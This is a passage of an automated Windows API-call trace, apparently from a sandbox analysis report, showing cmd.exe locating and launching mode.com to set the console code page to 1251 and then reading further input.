(_String1="mode", _String2="SETLOCAL") returned -6 [0032.191] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0032.191] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0032.191] _wcsicmp (_String1="mode", _String2="START") returned -6 [0032.192] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0032.192] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0032.192] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0032.192] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0032.192] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0032.192] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0032.192] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0032.192] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0032.192] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0032.192] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0032.192] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0032.192] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0032.192] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0032.192] GetProcessHeap () returned 0x280000 [0032.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x281ab0 [0032.192] GetProcessHeap () returned 0x280000 [0032.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x42) returned 0x2998a0 [0032.192] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0032.192] GetProcessHeap () returned 0x280000 [0032.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x299a80 [0032.192] SetErrorMode (uMode=0x0) returned 0x0 [0032.192] SetErrorMode (uMode=0x1) returned 0x0 [0032.192] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x299a90, lpFilePart=0x18f070 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f070*="Desktop") returned 0x25 [0032.192] SetErrorMode (uMode=0x0) returned 0x1 [0032.193] GetProcessHeap () returned 0x280000 [0032.193] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299a80, Size=0x66) returned 0x299a80 [0032.193] GetProcessHeap () returned 0x280000 [0032.193] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299a80) returned 0x66 [0032.193] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.193] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0032.193] GetProcessHeap () returned 0x280000 [0032.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x128) returned 0x281cd0 [0032.193] GetProcessHeap () returned 0x280000 [0032.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x240) returned 0x299b00 [0032.198] GetProcessHeap () returned 0x280000 [0032.198] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299b00, Size=0x12a) returned 0x299b00 [0032.198] GetProcessHeap () returned 0x280000 [0032.198] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299b00) returned 0x12a [0032.198] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.198] GetProcessHeap () returned 0x280000 [0032.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x295b70 [0032.198] GetProcessHeap () returned 0x280000 [0032.198] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x295b70, Size=0x7e) returned 0x295b70 [0032.198] GetProcessHeap () returned 0x280000 [0032.198] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295b70) returned 0x7e [0032.201] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.201] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0xffffffffffffffff [0032.201] GetLastError () returned 0x2 [0032.201] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0xffffffffffffffff [0032.202] GetLastError () returned 0x2 [0032.202] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.202] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0x295c00 [0032.202] GetProcessHeap () returned 0x280000 [0032.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x28) returned 0x294640 [0032.202] FindClose (in: hFindFile=0x295c00 | out: hFindFile=0x295c00) returned 1 [0032.202] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x18ede0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede0) returned 0x295c00 [0032.202] GetProcessHeap () returned 0x280000 [0032.202] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x294640, Size=0x8) returned 0x2998f0 [0032.202] FindClose (in: hFindFile=0x295c00 | out: hFindFile=0x295c00) returned 1 [0032.202] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0032.202] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0032.202] GetConsoleTitleW (in: lpConsoleTitle=0x18f330, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.202] GetProcessHeap () returned 0x280000 [0032.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x21c) returned 0x299c40 [0032.202] GetConsoleTitleW (in: lpConsoleTitle=0x299c50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.203] GetProcessHeap () returned 0x280000 [0032.203] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299c40, Size=0xa8) returned 0x299c40 [0032.203] GetProcessHeap () returned 0x280000 [0032.203] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299c40) returned 0xa8 [0032.203] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0032.203] GetProcessHeap () returned 0x280000 [0032.203] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299c40 | out: hHeap=0x280000) returned 1 [0032.203] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f0e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f0a8 | out: lpAttributeList=0x18f0e8, lpSize=0x18f0a8) returned 1 [0032.203] UpdateProcThreadAttribute (in: lpAttributeList=0x18f0e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f098, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f0e8, lpPreviousValue=0x0) returned 1 [0032.203] GetStartupInfoW (in: lpStartupInfo=0x18f200 | out: lpStartupInfo=0x18f200*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0032.203] GetProcessHeap () returned 0x280000 [0032.203] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x294640 [0032.203] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0032.203] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0032.203] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0032.203] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.203] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.204] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.204] GetProcessHeap () returned 0x280000 [0032.204] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294640 | out: hHeap=0x280000) returned 1 [0032.204] GetProcessHeap () returned 0x280000 [0032.204] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x12) returned 0x298900 [0032.204] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18f120*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f0d0 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x18f0d0*(hProcess=0x54, hThread=0x50, dwProcessId=0xae8, dwThreadId=0xaec)) returned 1 [0032.213] CloseHandle (hObject=0x50) returned 1 [0032.213] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0032.213] GetProcessHeap () returned 0x280000 [0032.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c230 | out: hHeap=0x280000) returned 1 [0032.213] GetEnvironmentStringsW () returned 0x29aa10* [0032.213] GetProcessHeap () returned 0x280000 [0032.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xae8) returned 0x29b500 [0032.213] FreeEnvironmentStringsW (penv=0x29aa10) returned 1 [0032.213] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76f50000 [0032.213] GetProcAddress (hModule=0x76f50000, lpProcName="NtQueryInformationProcess") returned 0x76fa14a0 [0032.213] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x18e9d8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x18e9d8, ReturnLength=0x0) returned 0x0 [0032.213] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x18ea10, nSize=0x380, lpNumberOfBytesRead=0x18e9d0 | out: lpBuffer=0x18ea10*, lpNumberOfBytesRead=0x18e9d0*=0x380) returned 1 [0032.213] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0032.620] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18f018 | out: lpExitCode=0x18f018*=0x0) returned 1 [0032.620] CloseHandle (hObject=0x54) returned 1 [0032.620] _vsnwprintf (in: _Buffer=0x18f288, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f028 | out: _Buffer="00000000") returned 8 [0032.620] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0032.620] GetProcessHeap () returned 0x280000 [0032.620] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b500 | out: hHeap=0x280000) returned 1 [0032.620] GetEnvironmentStringsW () returned 0x29aa10* [0032.620] GetProcessHeap () returned 0x280000 [0032.620] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0e) returned 0x29eb10 [0032.620] FreeEnvironmentStringsW (penv=0x29aa10) returned 1 [0032.620] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0032.620] GetProcessHeap () returned 0x280000 [0032.621] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29eb10 | out: hHeap=0x280000) returned 1 [0032.621] GetEnvironmentStringsW () returned 0x29aa10* [0032.621] GetProcessHeap () returned 0x280000 [0032.621] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0e) returned 0x29eb10 [0032.621] FreeEnvironmentStringsW (penv=0x29aa10) returned 1 [0032.621] GetProcessHeap () returned 0x280000 [0032.621] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x298900 | out: hHeap=0x280000) returned 1 [0032.621] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f0e8 | out: lpAttributeList=0x18f0e8) [0032.623] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0032.623] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.623] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0032.623] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.623] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a20e194 | out: lpMode=0x4a20e194) returned 0 [0032.624] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.624] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a20e198 | out: lpMode=0x4a20e198) returned 0 [0032.624] GetConsoleOutputCP () returned 0x4e3 [0032.624] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a21bfe0 | out: lpCPInfo=0x4a21bfe0) returned 1 [0032.624] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.624] GetProcessHeap () returned 0x280000 [0032.624] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295b70 | out: hHeap=0x280000) returned 1 [0032.624] GetProcessHeap () returned 0x280000 [0032.624] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299b00 | out: hHeap=0x280000) returned 1 [0032.624] GetProcessHeap () returned 0x280000 [0032.624] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x281cd0 | out: hHeap=0x280000) returned 1 [0032.624] GetProcessHeap () returned 0x280000 [0032.624] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299a80 | out: hHeap=0x280000) returned 1 [0032.624] GetProcessHeap () returned 0x280000 [0032.625] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2998a0 | out: hHeap=0x280000) returned 1 [0032.625] GetProcessHeap () returned 0x280000 [0032.625] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x281ab0 | out: hHeap=0x280000) returned 1 [0032.625] GetProcessHeap () returned 0x280000 [0032.625] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296510 | out: hHeap=0x280000) returned 1 [0032.625] GetProcessHeap () returned 0x280000 [0032.625] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294610 | out: hHeap=0x280000) returned 1 [0032.625] GetProcessHeap () returned 0x280000 [0032.625] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2997e0 | out: hHeap=0x280000) returned 1 [0032.625] _vsnwprintf (in: _Buffer=0x4a226340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f548 | out: _Buffer="\r\n") returned 2 [0032.625] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.625] GetFileType (hFile=0xf4) returned 0x3 [0032.625] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.625] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.625] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f518, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f518*=0x2, lpOverlapped=0x0) returned 1 [0032.625] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0032.625] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a21c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.625] _vsnwprintf (in: _Buffer=0x4a20eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x18f558 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0032.625] _vsnwprintf (in: _Buffer=0x4a20ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x18f558 | out: _Buffer=">") returned 1 [0032.625] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.625] GetFileType (hFile=0xf4) returned 0x3 [0032.625] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.625] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0032.625] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x18f548, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f548*=0x26, lpOverlapped=0x0) returned 1 [0032.625] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.625] GetFileType (hFile=0xe8) returned 0x3 [0032.626] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.626] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.626] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.626] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0032.626] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.626] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.626] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.626] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0032.626] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.626] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.626] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.626] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0032.626] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.626] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.626] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.626] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0032.626] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.626] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.626] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.626] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0032.626] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.626] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.626] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.626] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0032.626] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.626] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.626] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.626] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0032.627] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.627] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.627] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.627] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0032.627] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.627] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.627] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.627] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0032.627] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.627] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.627] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.627] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, 